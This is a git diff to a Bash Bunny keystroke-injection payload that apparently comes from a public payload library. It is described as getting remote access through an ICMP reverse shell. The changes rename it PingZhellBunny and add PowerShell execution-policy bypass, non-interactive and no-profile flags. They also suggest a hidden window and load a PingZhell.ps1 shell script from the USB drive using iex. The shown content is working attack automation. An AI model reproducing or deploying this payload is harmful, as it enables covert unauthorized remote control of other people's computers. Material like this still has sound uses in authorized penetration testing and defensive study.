diff --git a/payloads/library/remote_access/pingUinBunny/payload.txt b/payloads/library/remote_access/pingUinBunny/payload.txt index 10da7bbb..43d25da3 100644 --- a/payloads/library/remote_access/pingUinBunny/payload.txt +++ b/payloads/library/remote_access/pingUinBunny/payload.txt @@ -1,9 +1,9 @@ #!/bin/bash # -# Title: pingUinBunny +# Title: PingZhellBunny # Description: Get remote access using a icmp reverse shell. # Author: 0iphor13 -# Version: 1.0 +# Version: 1.3 # Category: Remote_Access # Attackmodes: HID, Storage @@ -22,21 +22,17 @@ ATTACKMODE HID STORAGE LED STAGE1 +#After you have adapted the delays for your target, add "-W hidden" DELAY 5000 -RUN WIN "powershell -Exec Bypass" +RUN WIN "powershell -Exec Bypass -NoP -NonI" DELAY 6000 Q ENTER DELAY 10000 -Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')" -DELAY 10000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" +DELAY 20000 Q ENTER DELAY 10000 -Q STRING "Invoke-pingUin -IpAddress 0.0.0.0" -DELAY 10000 -Q ENTER - -DELAY 5000 ATTACKMODE HID